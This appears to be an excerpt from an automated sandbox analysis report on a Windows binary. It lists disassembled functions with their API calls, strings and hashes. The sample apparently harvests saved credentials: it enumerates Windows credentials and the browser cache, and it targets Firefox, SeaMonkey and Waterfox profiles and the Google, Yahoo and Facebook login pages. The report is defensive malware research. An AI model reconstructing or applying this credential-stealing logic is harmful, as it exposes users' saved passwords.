                                                                                                                                                                                                                              • API String ID: 2804212203-2982631422
                                                                                                                                                                                                                              • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                                                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 115830560-3916222277
                                                                                                                                                                                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError free 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 free 870->877 871->870 877->855
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                              • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                              • String ID: |A
                                                                                                                                                                                                                              • API String ID: 77810686-1717621600
                                                                                                                                                                                                                              • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                              • String ID: r!A
                                                                                                                                                                                                                              • API String ID: 2791114272-628097481
                                                                                                                                                                                                                              • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                              • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                              • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                              • String ID: BIN
                                                                                                                                                                                                                              • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                              • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 697348961-0
                                                                                                                                                                                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                              • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                              • API String ID: 3527940856-11920434
                                                                                                                                                                                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                              • API String ID: 3527940856-2068335096
                                                                                                                                                                                                                              • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                              • API String ID: 3527940856-3369679110
                                                                                                                                                                                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                              • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                              • String ID: $0.@
                                                                                                                                                                                                                              • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
